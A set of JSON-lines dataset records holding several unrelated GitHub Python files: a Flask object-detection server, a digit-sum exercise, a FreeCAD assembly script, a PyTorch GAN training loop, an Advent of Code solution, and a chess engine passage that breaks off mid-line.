str_file = base64.b64encode(imageFile.read())\r\n print(str_file)\r\n\r\n\r\napp = Flask(__name__, template_folder='template')\r\n\r\n\r\n@app.route(\"/\", methods=[\"GET\",\"POST\"])\r\ndef predict():\r\n with graph.as_default():\r\n fh = open(\"imageToSave.png\", \"wb\")\r\n fh.write(base64.decodestring(str_file))\r\n fh.close()\r\n log.debug(\"File decrypted !!\")\r\n filename = \"imageToSave.png\"\r\n\r\n log.basicConfig(filename=\"logs.log\", level=log.DEBUG)\r\n # giving the filename\r\n # filename = \"image.jpg\"\r\n execution_path = os.getcwd()\r\n\r\n # creating the detector object for ObjectDetection\r\n log.info(\"Detector activated \")\r\n detector = ObjectDetection()\r\n detector.setModelTypeAsRetinaNet()\r\n detector.setModelPath(os.path.join(execution_path, \"resnet50_coco_best_v2.0.1.h5\"))\r\n detector.loadModel()\r\n detections = detector.detectObjectsFromImage(input_image=filename,\r\n output_image_path=os.path.join(execution_path, \"imagenew.jpg\"))\r\n\r\n # printing the found object names and the probability value\r\n result = dict()\r\n\r\n for eachObject in detections:\r\n # print(eachObject[\"name\"], \" : \", eachObject[\"percentage_probability\"])\r\n result.update({eachObject[\"name\"]: eachObject[\"percentage_probability\"]})\r\n\r\n print(result)\r\n return sendResponse(result)\r\n K.clear_session()\r\n # displaying image after object detection\r\n img = Image.open('imagenew.jpg')\r\n img.show()\r\n\r\n # passing an string value of image to object\r\n # object detect class gets inherited from imageconvert\r\n\r\n if request.method=='POST':\r\n return result\r\n\r\n@app.route('/form', methods=['GET', 'POST'])\r\ndef form_example():\r\n if request.method == 'POST':\r\n with graph.as_default():\r\n fh = open(\"imageToSave.png\", \"wb\")\r\n fh.write(base64.decodestring(str_file))\r\n fh.close()\r\n log.debug(\"File decrypted !!\")\r\n filename = \"imageToSave.png\"\r\n\r\n log.basicConfig(filename=\"logs.log\", level=log.DEBUG)\r\n # giving the filename\r\n # filename = \"image.jpg\"\r\n execution_path = os.getcwd()\r\n\r\n # creating the detector object for ObjectDetection\r\n log.info(\"Detector activated \")\r\n detector = ObjectDetection()\r\n detector.setModelTypeAsRetinaNet()\r\n detector.setModelPath(os.path.join(execution_path, \"resnet50_coco_best_v2.0.1.h5\"))\r\n detector.loadModel()\r\n detections = detector.detectObjectsFromImage(input_image=filename,\r\n output_image_path=os.path.join(execution_path, \"imagenew.jpg\"))\r\n\r\n # printing the found object names and the probability value\r\n result = dict()\r\n\r\n for eachObject in detections:\r\n # print(eachObject[\"name\"], \" : \", eachObject[\"percentage_probability\"])\r\n result.update({eachObject[\"name\"]: eachObject[\"percentage_probability\"]})\r\n\r\n print(result)\r\n return sendResponse(result)\r\n K.clear_session()\r\n\r\n return ''''''\r\n\r\n\r\ndef sendResponse(responseObj):\r\n response = jsonify(responseObj)\r\n return response\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print((\"* Loading Keras model and Flask starting server...\"\r\n \"please wait until server has fully started\"))\r\n init()\r\n app.run(threaded=True, debug=\"on\", port=9000)\r\n","repo_name":"nikzjadhav/Object-detection-flask","sub_path":"App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":4691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"37228837022","text":"#zbroj znamenaka prirodnog broja\r\n#ulaz(n)\r\n#s = 0\r\n#dok je n > 0 činiti\r\n#{\r\n# s = s + n mod 10\r\n# n = n div 10\r\n#}\r\n#############################\r\n\r\nn = int(input (\"Upiši broj : \"))\r\nn0 = n\r\ns = 0\r\nwhile n > 0 :\r\n s = s + n % 10\r\n n = n // 10\r\nprint(\"Zbroj znamenaka broja \" +str(n0)+ \" je \" +str(s))\r\n","repo_name":"nekm/Informatika_matura","sub_path":"2019_j_18.py","file_name":"2019_j_18.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"hr","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"44374684744","text":"# Importing standard libs\nimport sys\n\n# Insert this directory into the PYTHONPATH to import experimental parameters from experiment_params.py\nsys.path.insert(0, \"${HOME}/work/git/Lab-Management/freecad_models/EM_Coupling_Experiment/code\")\n\n# Insert this directoryinto the PYTHONPATH to import Assembly 2 module\nsys.path.append('${HOME}/.FreeCAD/Mod/FreeCAD_assembly2')\n\n# Importing Assembly 2 libraries\n# Assembly2 is an additional FreeCAD workbench (https://github.com/hamish2014/FreeCAD_assembly2)\nimport importPart\nimport planeConstraint\nimport axialConstraint\n\n# Importing experiment specific parameters\n\n###############################################################################\n# Create and open a new file for assembly\n\nassembly_file = App.newDocument(\"daq\")\nApp.setActiveDocument(assembly_file.Name)\nApp.ActiveDocument = App.getDocument(assembly_file.Name)\nGui.ActiveDocument = Gui.getDocument(assembly_file.Name)\n\n###############################################################################\n# Import computer_table\ncomputer_table = importPart.importPart(filename = '../computer/models/Table.STEP', partName = None, doc_assembly = assembly_file)\n\nApp.ActiveDocument.recompute()\nGui.SendMsgToActiveView(\"ViewFit\")\nGui.activeDocument().activeView().viewAxonometric()\n\n# Fix the position and orientation of computer_table\ncomputer_table.Placement = App.Placement(App.Vector(0,0,0),App.Rotation(App.Vector(1,0,0),90))\n\n################################################################################\n# Import QM9 Data Acquisition System base\n\ndaq_base = importPart.importPart(filename = 'models/QM9_base.fcstd', partName = None, doc_assembly = assembly_file)\n\nApp.ActiveDocument.recompute()\nGui.SendMsgToActiveView(\"ViewFit\")\nGui.activeDocument().activeView().viewAxonometric()\n\n\n# Place on table\nGui.Selection.clearSelection()\nGui.Selection.addSelection(daq_base , \"Face227\") \nGui.Selection.addSelection(computer_table, \"Face010\")\n\nselection = Gui.Selection.getSelectionEx()\ndaq_base_table_surface = planeConstraint.parseSelection(selection, objectToUpdate=None)\n\ndaq_base_table_surface.directionConstraint = u\"opposed\"\nApp.ActiveDocument.recompute()\n\n\n# Side offset\nGui.Selection.clearSelection()\nGui.Selection.addSelection(daq_base , \"Face232\") \nGui.Selection.addSelection(computer_table, \"Face005\")\n\nselection = Gui.Selection.getSelectionEx()\ndaq_base_table_side = planeConstraint.parseSelection(selection, objectToUpdate=None)\n\ndaq_base_table_side.offset = 500\nApp.ActiveDocument.recompute()\n\n# Front offset\nGui.Selection.clearSelection()\nGui.Selection.addSelection(daq_base , \"Face236\") \nGui.Selection.addSelection(computer_table, \"Face007\")\n\nselection = Gui.Selection.getSelectionEx()\ndaq_base_table_front = planeConstraint.parseSelection(selection, objectToUpdate=None)\n\ndaq_base_table_front.offset = -200\nApp.ActiveDocument.recompute()\n\n################################################################################\n# Import QM9 Data Acquisition System top\n\ndaq_top = importPart.importPart(filename = 'models/QM9_top.fcstd', partName = None, doc_assembly = assembly_file)\n\nApp.ActiveDocument.recompute()\nGui.SendMsgToActiveView(\"ViewFit\")\nGui.activeDocument().activeView().viewAxonometric()\n\n\n# Place on daq base\nGui.Selection.clearSelection()\nGui.Selection.addSelection(daq_base, \"Face265\") \nGui.Selection.addSelection(daq_top , \"Face126\")\n\nselection = Gui.Selection.getSelectionEx()\ndaq_base_top = planeConstraint.parseSelection(selection, objectToUpdate=None)\n\ndaq_base_top.directionConstraint = u\"opposed\"\nApp.ActiveDocument.recompute()\n\n\n# Side mate\nGui.Selection.clearSelection()\nGui.Selection.addSelection(daq_base, \"Face242\") \nGui.Selection.addSelection(daq_top , \"Face133\")\n\nselection = Gui.Selection.getSelectionEx()\ndaq_base_top_side = planeConstraint.parseSelection(selection, objectToUpdate=None)\n\n# Front mate\nGui.Selection.clearSelection()\nGui.Selection.addSelection(daq_base, \"Face226\") \nGui.Selection.addSelection(daq_top , \"Face157\")\n\nselection = Gui.Selection.getSelectionEx()\ndaq_base_top_front = planeConstraint.parseSelection(selection, objectToUpdate=None)\n\n","repo_name":"QuazarTech/Lab-Management","sub_path":"freecad_models/QM9/QM9.py","file_name":"QM9.py","file_ext":"py","file_size_in_byte":4257,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"}
+{"seq_id":"39882231349","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision.utils as vutils\nfrom tqdm import tqdm\nfrom pickle import dump\n\n# set weights for stability\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n nn.init.normal_(m.weight.data, 1.0, 0.02)\n nn.init.constant_(m.bias.data, 0)\n\n\nreal_label = 1\nfake_label = 0\n# Initialize BCELoss function\ncriterion_G = nn.BCELoss()\ncriterion_D = nn.BCELoss()\n\n\ndef training_loop(results_dir, num_epochs, dataloader, netD, netG, device, lr, beta1, nz):\n\n optimizerD = optim.Adam(netD.parameters(), lr=lr, betas=(beta1, 0.999))\n optimizerG = optim.Adam(netG.parameters(), lr=lr, betas=(beta1, 0.999))\n fixed_noise = torch.randn(128, nz, 1, 1, device=device)\n\n img_list = []\n G_losses = []\n D_losses = []\n\n iters = 0\n big_iters = 0\n\n print(\"Starting Training Loop...\")\n for epoch in range(num_epochs):\n\n # For each batch in the dataloader\n for i, data in tqdm(enumerate(dataloader, 0)):\n ############################\n # (1) Update D network: maximize log(D(x)) + log(1 - D(G(z)))\n ###########################\n ## Train with all-real batch\n netD.zero_grad()\n # Format batch\n real_cpu = data[0].to(device)\n b_size = real_cpu.size(0)\n label = torch.full((b_size,), real_label * 0.9, device=device)\n # Forward pass real batch through D\n output = netD(real_cpu).view(-1)\n # Calculate loss on all-real batch\n errD_real = criterion_D(output, label)\n # Calculate gradients for D in backward pass\n errD_real.backward()\n D_x = output.mean().item()\n\n ## Train with all-fake batch\n # Generate batch of latent vectors\n noise = torch.randn(b_size, nz, 1, 1, device=device)\n # Generate fake image batch with G\n fake = netG(noise)\n label.fill_(fake_label)\n # Classify all fake batch with D\n output = netD(fake.detach()).view(-1)\n # Calculate D's loss on the all-fake batch\n errD_fake = criterion_D(output, label)\n # Calculate the gradients for this batch\n errD_fake.backward()\n D_G_z1 = output.mean().item()\n # Add the gradients from the all-real and all-fake batches\n errD = errD_real + errD_fake\n # Update D\n optimizerD.step()\n\n ############################\n # (2) Update G network: maximize log(D(G(z)))\n ###########################\n netG.zero_grad()\n label.fill_(real_label) # fake labels are real for generator cost\n # Since we just updated D, perform another forward pass of all-fake batch through D\n output = netD(fake).view(-1)\n # Calculate G's loss based on this output\n errG = criterion_G(output, label)\n # Calculate gradients for G\n errG.backward()\n D_G_z2 = output.mean().item()\n # Update G\n optimizerG.step()\n\n # Output training stats\n if i % 50 == 0:\n print('[%d/%d][%d/%d]\\tLoss_D: %.4f\\tLoss_G: %.4f\\tD(x): %.4f\\tD(G(z)): %.4f / %.4f'\n % (epoch, num_epochs, i, len(dataloader),\n errD.item(), errG.item(), D_x, D_G_z1, D_G_z2))\n\n torch.save(netG, results_dir+\"generator.pyt\")\n torch.save(netD, results_dir+\"discriminator.pyt\")\n\n # Save Losses for plotting later\n G_losses.append(errG.item())\n D_losses.append(errD.item())\n\n # Check how the generator is doing by saving G's output on fixed_noise\n if (iters % 500 == 0) or ((epoch == num_epochs - 1) and (i == len(dataloader) - 1)):\n big_iters += 1\n with torch.no_grad():\n fake = netG(fixed_noise).detach().cpu()\n img_list.append(vutils.make_grid(fake, padding=2, normalize=True))\n torch.save(netG, results_dir+\"generator_snapshot\"+str(big_iters)+\".pyt\")\n torch.save(netD, results_dir+\"discriminator_snapshot\"+str(big_iters)+\".pyt\")\n dump(img_list,open(results_dir+\"image_list.pkl\",'wb'))\n\n iters += 1\n\n return D_losses, G_losses, img_list","repo_name":"ejnhbrown/ganmorph","sub_path":"rich_sandbox/Training_funcs.py","file_name":"Training_funcs.py","file_ext":"py","file_size_in_byte":4546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"34528179248","text":"import numpy as np\nimport os\n\nINPUT = os.path.join(os.path.dirname(__file__), \"input.txt\")\n\nwith open(INPUT) as f:\n lines = f.readlines()\n\n# Remove trailing Whitespace and cast to int\nlines = [int(line.rstrip()) for line in lines]\n\n# Part 1\n# Take Difference between two successive elements. Count elements where difference > 0\nlines_arr = np.array(lines)\ndiff = np.diff(lines_arr)\nprint(diff[diff > 0].shape)\n\n\n# Part 2\n# Same as Part 1 but with moving window sum\nlines_arr = np.array(lines)\nmoving_window = np.ones((3,))\n\nwindow_sum = np.convolve(lines_arr, moving_window, mode=\"valid\")\ndiff = np.diff(window_sum)\nprint(diff[diff > 0].shape)\n","repo_name":"LiXiling/advent-of-code-2021","sub_path":"01/aoc_01.py","file_name":"aoc_01.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"70386054832","text":"#\n# Created by: Daymenion 16/05/2022\n#\n# this program under the GNU General Public License v3.0 license.\n\nimport tkinter as tk\nfrom tkinter import simpledialog\n\n\nclass GameState:\n def __init__(self):\n\n # board setup (8x8 board with empty squares)\n self.board = [\n [\"bR\", \"bN\", \"bB\", \"bQ\", \"bK\", \"bB\", \"bN\", \"bR\"],\n [\"bP\", \"bP\", \"bP\", \"bP\", \"bP\", \"bP\", \"bP\", \"bP\"],\n [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\n [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\n [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\n [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\n [\"wP\", \"wP\", \"wP\", \"wP\", \"wP\", \"wP\", \"wP\", \"wP\"],\n [\"wR\", \"wN\", \"wB\", \"wQ\", \"wK\", \"wB\", \"wN\", \"wR\"]]\n\n self.whiteToMove = True # white to move first\n self.moveLog = [] # list of moves made\n self.whiteKingLocation = (7, 4) # white king location (row, col)\n self.blackKingLocation = (0, 4) # black king location (row, col)\n self.possibleMoveFunctions = {'P': self.getPawnMoves, 'N': self.getKnightMoves, 'B': self.getBishopMoves,\n 'R': self.getRookMoves, 'Q': self.getQueenMoves,\n 'K': self.getKingMoves} # dictionary of possible move functions for each piece\n self.enpassantPossible = () # the square for enpassant possible\n self.checkMate = False # checkmate flag\n self.staleMate = False # stalemate flag\n\n self.inCheck = False # check flag\n self.pins = [] # list of pins for each piece\n self.checks = [] # list of checks for each piece (for AI)\n\n self.currentCastlingRights = CastleRights(True, True, True, True) # wks, wqs, bks, bqs (True = can castle)\n # Deep Copy Rights object\n self.castleRightsLog = [\n CastleRights(self.currentCastlingRights.wks, self.currentCastlingRights.bks, self.currentCastlingRights.wqs,\n self.currentCastlingRights.bqs)] # wks, wqs, bks, bqs (True can castle) list of rights objects\n\n # Simple Chess Moves: Pawns, Knights, Bishops, Rooks, Queens, Kings (no castling)\n def makeMove(self, move):\n self.board[move.startRow][move.startCol] = \"--\" # remove piece from start square\n\n self.board[move.endRow][move.endCol] = move.pieceMoved # add piece to end square\n\n self.moveLog.append(move) # add move to move log\n self.whiteToMove = not self.whiteToMove # switch turn to next player\n\n if move.pieceMoved == 'wK': # if white king moved\n self.whiteKingLocation = (move.endRow, move.endCol) # update white king location\n elif move.pieceMoved == 'bK': # if black king moved\n self.blackKingLocation = (move.endRow, move.endCol) # update black king location\n\n # For Pawn Promotion:\n if move.isPawnPromotion:\n if move.AIPlaying:\n self.board[move.endRow][move.endCol] = move.pieceMoved[\n 0] + move.AIPromotionKey # add piece to end square\n else:\n ROOT = tk.Tk()\n\n ROOT.withdraw()\n # the input dialog\n\n while True:\n promotedPiece = simpledialog.askstring(\"Game Mode:\", \"Please select a game mode: \\nQ)Queen(Q) \"\n \"\\nR)Rook(R) \\nB)Bishop(B) \\nN)Knight(N)\",\n initialvalue=\"Q\") # ask for promotion piece\n\n print(promotedPiece)\n promotion = ['Q', 'R', 'B', 'N']\n if promotedPiece in promotion:\n self.board[move.endRow][move.endCol] = move.pieceMoved[\n 0] + promotedPiece # add piece to end square\n break\n else:\n print(\"invalid Promotion\")\n\n # Update Enpassant Variable only if Pawn Moves Two Squares:\n if move.pieceMoved[1] == 'P' and abs(move.startRow - move.endRow) == 2: # if pawn moved two squares\n self.enpassantPossible = ((move.startRow + move.endRow) // 2,\n move.startCol) # update enpassant variable\n else:\n self.enpassantPossible = () # reset enpassant variable\n\n # For Enpassant Move:\n if move.isEnpassantMove: # if enpassant move is true\n self.board[move.startRow][move.endCol] = '--' # remove captured pawn from board\n\n # For Castle Move:\n if move.isCastleMove:\n if move.endCol - move.startCol == 2: # King side Castle\n self.board[move.endRow][move.endCol - 1] = self.board[move.endRow][\n move.endCol + 1] # move rook to new square\n self.board[move.endRow][move.endCol + 1] = '--'\n else: # Queen Side Castle\n self.board[move.endRow][move.endCol + 1] = self.board[move.endRow][\n move.endCol - 2] # move rook to new square\n self.board[move.endRow][move.endCol - 2] = '--'\n\n # Updating Castle Rights on Each Move:\n self.updateCastleRights(move)\n self.castleRightsLog.append(\n CastleRights(self.currentCastlingRights.wks, self.currentCastlingRights.bks, self.currentCastlingRights.wqs,\n self.currentCastlingRights.bqs)) # add castle rights to log\n\n def undoMove(self): # undo move function\n\n if len(self.moveLog) != 0:\n\n move = self.moveLog.pop() # pop last move from log (undo last move)\n\n self.board[move.startRow][move.startCol] = move.pieceMoved # move piece back to start square\n self.board[move.endRow][move.endCol] = move.pieceCaptured # move piece back to end square\n self.whiteToMove = not self.whiteToMove # switching the turn\n if move.pieceMoved == 'wK':\n self.whiteKingLocation = (move.startRow, move.startCol) # update white king location\n elif move.pieceMoved == 'bK':\n self.blackKingLocation = (move.startRow, move.startCol) # update black king location\n\n # Undo Enpassant Move\n if move.isEnpassantMove:\n self.board[move.endRow][\n move.endCol] = '--' # Making The Ending square blank as the pawn captured was not in that square\n self.board[move.startRow][move.endCol] = move.pieceCaptured # move pawn back to start square\n self.enpassantPossible = (move.endRow, move.endCol) # update enpassant variable\n\n # Undo the captured\n if move.pieceMoved[1] == 'P' and abs(\n move.startRow - move.endRow) == 2: # if pawn moved two squares and captured\n self.enpassantPossible = () # reset enpassant variable\n\n # undo Castle Rights\n self.castleRightsLog.pop() # pop last castle rights from log\n newRights = self.castleRightsLog[-1] # get last castle rights from log\n self.currentCastlingRights = CastleRights(newRights.wks, newRights.bks, newRights.wqs,\n newRights.bqs) # update current castle rights\n\n # undo Castle Move\n if move.isCastleMove:\n if move.endCol - move.startCol == 2: # King side Castle\n self.board[move.endRow][move.endCol + 1] = self.board[move.endRow][\n move.endCol - 1] # move rook back to new square\n self.board[move.endRow][move.endCol - 1] = '--'\n else: # Queen Side Castle\n self.board[move.endRow][move.endCol - 2] = self.board[move.endRow][\n move.endCol + 1] # move rook back to new square\n self.board[move.endRow][move.endCol + 1] = '--'\n\n self.checkMate = False # reset checkmate variable\n self.staleMate = False # reset stalemate variable\n\n def updateCastleRights(self, move): # update castle rights function\n if move.pieceMoved == 'wK': # if white king moved\n self.currentCastlingRights.wks = False # set white king side castle to false\n self.currentCastlingRights.wqs = False # set white queen side castle to false\n elif move.pieceMoved == 'bK': # if black king moved\n self.currentCastlingRights.bks = False # set black king side castle to false\n self.currentCastlingRights.bqs = False # set black queen side castle to false\n elif move.pieceMoved == 'wR': # if white rook moved\n if move.startRow == 7: # if white rook moved from row 7\n if move.startCol == 0: # if white rook moved from col 0\n self.currentCastlingRights.wqs = False # set white queen side castle to false\n elif move.startCol == 7: # if white rook moved from col 7\n self.currentCastlingRights.wks = False # set white king side castle to false\n elif move.pieceMoved == 'bR': # if black rook moved\n if move.startRow == 0: # if black rook moved from row 0\n if move.startCol == 0: # if black rook moved from col 0\n self.currentCastlingRights.bqs = False # set black queen side castle to false\n elif move.startCol == 7: # if black rook moved from col 7\n self.currentCastlingRights.bks = False # set black king side castle to false\n if move.pieceCaptured == 'wR': # if white rook captured\n if move.startRow == 7: # if white rook moved from row 7\n if move.startCol == 0: # if white rook moved from col 0\n self.currentCastlingRights.wqs = False # set white queen side castle to false\n elif move.startCol == 7: # if white rook moved from col 7\n self.currentCastlingRights.wks = False # set white king side castle to false\n elif move.pieceCaptured == 'bR': # if black rook captured\n if move.startRow == 0: # if black rook moved from row 0\n if move.startCol == 0: # if black rook moved from col 0\n self.currentCastlingRights.bqs = False # set black queen side castle to false\n elif move.startCol == 7: # if black rook moved from col 7\n self.currentCastlingRights.bks = False # set black king side castle to false\n\n # every possible move that a piece can make without the concern of other pieces\n def getAllPossibleMoves(self): # get all possible moves function\n\n possibleMoves = [] # list of possible moves\n\n for row in range(len(self.board)):\n for col in range(len(self.board[row])):\n turn = self.board[row][col][0] # get the first character of the piece\n if (turn == 'w' and self.whiteToMove) or (\n turn == 'b' and not self.whiteToMove): # if it's correct turn and the piece is white or black\n piece = self.board[row][col][1] # get the second character of the piece\n self.possibleMoveFunctions[piece](row, col,\n possibleMoves) # call the function that corresponds to the piece\n\n return possibleMoves # return the list of possible moves\n\n def getValidMoves(self): # get valid moves function (returns a list of valid moves)\n\n moves = [] # list of valid moves\n self.inCheck, self.pins, self.checks = self.checkForPinsAndChecks() # check for pins and checks\n\n if self.whiteToMove: # if it is white's turn\n kingRow = self.whiteKingLocation[0] # get the row of the white king\n kingCol = self.whiteKingLocation[1] # get the col of the white king\n allyColor = 'w' # set the color of the pieces to white\n else: # if it is black's turn\n kingRow = self.blackKingLocation[0] # get the row of the black king\n kingCol = self.blackKingLocation[1] # get the col of the black king\n allyColor = 'b' # set the color of the pieces to black\n\n if self.inCheck: # if the king is in check (if the king is in check, then the king can't move)\n if len(self.checks) == 1: # if there is only one check\n moves = self.getAllPossibleMoves() # get all possible moves\n check = self.checks[0] # get the check\n checkRow = check[0] # get the row of the check\n checkCol = check[1] # get the col of the check\n pieceChecking = self.board[checkRow][checkCol] # get the piece that is checking the king\n validSquares = [] # list of valid squares\n if pieceChecking[0] == 'N': # if the piece checking the king is a knight\n validSquares = [(checkRow, checkCol)] # add the check square to the list of valid squares\n else:\n for i in range(1, 8): # for each direction\n validSquare = (kingRow + check[2] * i, kingCol + check[\n 3] * i) # get the valid square based on the direction of the check\n validSquares.append(validSquare) # add the valid square to the list of valid squares\n if validSquare[0] == checkRow and validSquare[\n 1] == checkCol: # if the valid square is the check square\n break # break out of the loop\n for i in range(len(moves) - 1, -1, -1):\n if moves[i].pieceMoved[1] != 'K': # if the piece moved is not a king\n if not (moves[i].endRow, moves[i].endCol) in validSquares: # if the end square\n # is not a valid square for the piece to move to\n moves.remove(moves[i]) # remove the move from the list of valid moves\n else:\n self.getKingMoves(kingRow, kingCol, moves) # get the king moves\n else:\n moves = self.getAllPossibleMoves() # get possible moves (if the king isn't in check, then king can move)\n self.getCastleMoves(kingRow, kingCol, moves,\n allyColor) # get the castle moves (if the king is not in check, then the king can move)\n\n return moves # return the list of valid moves\n\n def squareUnderAttack(self, row, col): # square under attack function (returns true if the square is under attack)\n\n self.whiteToMove = not self.whiteToMove # switch to opponent\n oppMoves = self.getAllPossibleMoves() # get all possible moves for the opponent\n\n self.whiteToMove = not self.whiteToMove # switch back to the original color\n\n for move in oppMoves: # for each move\n if move.endRow == row and move.endCol == col: # if the move ends at the square under attack\n return True # return true\n\n return False\n\n def getPawnMoves(self, row, col, possibleMoves): # get pawn moves function\n piecePinned = False # if the piece is pinned\n pinDirection = () # direction of the pin\n for i in range(len(self.pins) - 1, -1, -1): # for each pin in the list of pins\n if self.pins[i][0] == row and self.pins[i][1] == col: # if the pin is at the square under attack\n piecePinned = True # set piecePinned to true\n pinDirection = (self.pins[i][2], self.pins[i][3]) # get the direction of the pin\n self.pins.remove(self.pins[i]) # remove the pin from the list of pins\n break\n\n # for white pieces\n if self.whiteToMove:\n\n # move up 1 or 2 squres\n if self.board[row - 1][col] == \"--\": # if the square above is empty\n if not piecePinned or pinDirection == (-1, 0): # if the piece isn't pinned or the pin direction is up\n possibleMoves.append(\n Move((row, col), (row - 1, col), self.board)) # add the move to the list of possible moves\n if row == 6 and self.board[row - 2][\n col] == \"--\": # if the pawn is on its starting square and the square above it is empty\n possibleMoves.append(\n Move((row, col), (row - 2, col), self.board)) # add the move to the list of possible moves\n\n # move diagonals\n if col - 1 >= 0: # if the square to the left is on the board\n if self.board[row - 1][col - 1][0] == 'b': # if the square to the left is black\n if not piecePinned or pinDirection == (\n -1, -1): # if the piece isn't pinned or the pin direction is up left\n possibleMoves.append(Move((row, col), (row - 1, col - 1),\n self.board)) # add the move to the list of possible moves\n if (row - 1, col - 1) == self.enpassantPossible: # if the square to the left is the enpassant square\n possibleMoves.append(Move((row, col), (row - 1, col - 1), self.board,\n isEnpassantMove=True)) # add the move to the list of possible moves\n\n if col + 1 <= 7: # if the square to the right is on the board\n if self.board[row - 1][col + 1][0] == 'b': # if the square to the right is black\n if not piecePinned or pinDirection == (\n -1, 1): # if the piece isn't pinned or the pin direction is up right\n possibleMoves.append(Move((row, col), (row - 1, col + 1),\n self.board)) # add the move to the list of possible moves\n if (row - 1, col + 1) == self.enpassantPossible: # if the square to the right is the enpassant square\n possibleMoves.append(Move((row, col), (row - 1, col + 1), self.board,\n isEnpassantMove=True)) # add the move to the list of possible moves\n\n # for black pieces\n\n else:\n\n # move up 1 or 2 squres\n if self.board[row + 1][col] == \"--\": # if the square below is empty\n if not piecePinned or pinDirection == (1, 0): # if the piece isn't pinned or the pin direction is down\n possibleMoves.append(\n Move((row, col), (row + 1, col), self.board)) # add the move to the list of possible moves\n if row == 1 and self.board[row + 2][\n col] == \"--\": # if the pawn is on its starting square and the square below it is empty\n possibleMoves.append(\n Move((row, col), (row + 2, col), self.board)) # add the move to the list of possible moves\n\n # move diagonals\n if col - 1 >= 0: # if the square to the left is on the board\n if self.board[row + 1][col - 1][0] == 'w': # if the square to the left is white\n if not piecePinned or pinDirection == (\n 1, 1): # if the piece isn't pinned or the pin direction is down left\n possibleMoves.append(Move((row, col), (row + 1, col - 1),\n self.board)) # add the move to the list of possible moves\n if (row + 1, col - 1) == self.enpassantPossible: # if the square to the left is the enpassant square\n possibleMoves.append(Move((row, col), (row + 1, col - 1), self.board,\n isEnpassantMove=True)) # add the move to the list of possible moves\n\n if col + 1 <= 7: # if the square to the right is on the board\n if self.board[row + 1][col + 1][0] == 'w': # if the square to the right is white\n if not piecePinned or pinDirection == (\n 1, -1): # if the piece isn't pinned or the pin direction is down right\n possibleMoves.append(Move((row, col), (row + 1, col + 1),\n self.board)) # add the move to the list of possible moves\n if (row + 1, col + 1) == self.enpassantPossible: # if the square to the right is the enpassant square\n possibleMoves.append(Move((row, col), (row + 1, col + 1), self.board,\n isEnpassantMove=True)) # add the move to the list of possible moves\n\n def getKnightMoves(self, row, col, possibleMoves): # get knight moves function\n piecePinned = False # if the piece is pinned\n for i in range(len(self.pins) - 1, -1, -1): # for each pin in the list of pins\n if self.pins[i][0] == row and self.pins[i][1] == col: # if the pin is at the square under attack\n piecePinned = True # set piecePinned to true\n self.pins.remove(self.pins[i]) # remove the pin from the list of pins\n break\n\n knightMoves = ((-1, -2), (-1, 2), (1, -2), (1, 2), (-2, -1), (-2, 1), (2, -1), (2, 1))\n # L shapes as in left_down2, left_up2, right_down2, right_up2, left2_down, left2_up, right2_down, right2_up\n if self.whiteToMove: # if white to move\n allyColor = \"w\"\n else:\n allyColor = \"b\"\n\n for n_move in knightMoves: # for each move in the list of knight moves\n endRow = row + n_move[0] # get the row of the end square\n endCol = col + n_move[1] # get the column of the end square\n\n if 0 <= endRow <= 7 and 0 <= endCol <= 7: # if the end square is on the board\n if not piecePinned: # if the piece isn't pinned\n endPiece = self.board[endRow][endCol] # get the piece at the end square\n if endPiece[0] != allyColor: # if the end square is not the same color as the piece\n possibleMoves.append(Move((row, col), (endRow, endCol),\n self.board)) # add the move to the list of possible moves\n\n def getBishopMoves(self, row, col, possibleMoves): # get bishop moves function\n piecePinned = False # if the piece is pinned\n pinDirection = () # the pin direction\n for i in range(len(self.pins) - 1, -1, -1): # for each pin in the list of pins\n if self.pins[i][0] == row and self.pins[i][1] == col: # if the pin is at the square under attack\n piecePinned = True # set piecePinned to true\n pinDirection = (self.pins[i][2], self.pins[i][3]) # set pinDirection to the pin direction\n self.pins.remove(self.pins[i]) # remove the pin from the list of pins\n break\n\n bishopMoves = ((-1, -1), (1, -1), (-1, 1), (1, 1)) # left_down, right_down, left_up, right_up\n if self.whiteToMove:\n enemyColor = \"b\"\n else:\n enemyColor = \"w\"\n\n for b_moves in bishopMoves: # for each move in the list of bishop moves\n for i in range(1, 8): # for each square in the row\n endRow = row + b_moves[0] * i # get the row of the end square\n endCol = col + b_moves[1] * i # get the column of the end square\n if 0 <= endRow <= 7 and 0 <= endCol <= 7: # if the end square is on the board\n if not piecePinned or pinDirection == b_moves or pinDirection == (-b_moves[0], -b_moves[\n 1]): # if the piece isn't pinned or the pin direction is the same as the bishop move\n endPiece = self.board[endRow][endCol] # get the piece at the end square\n if endPiece == \"--\":\n possibleMoves.append(Move((row, col), (endRow, endCol),\n self.board)) # add the move to the list of possible moves\n elif endPiece[0] == enemyColor: # if the end square is the enemy color\n possibleMoves.append(Move((row, col), (endRow, endCol),\n self.board)) # add the move to the list of possible moves\n break\n else:\n break\n else:\n break\n\n def getRookMoves(self, row, col, possibleMoves): # get rook moves function\n piecePinned = False # if the piece is pinned\n pinDirection = () # the pin direction\n for i in range(len(self.pins) - 1, -1, -1): # for each pin in the list of pins\n if self.pins[i][0] == row and self.pins[i][1] == col: # if the pin is at the square under attack\n piecePinned = True # set piecePinned to true\n pinDirection = (self.pins[i][2], self.pins[i][3]) # set pinDirection to the pin direction\n if self.board[row][col][1] != 'Q': # if the piece isn't a queen\n self.pins.remove(self.pins[i]) # remove the pin from the 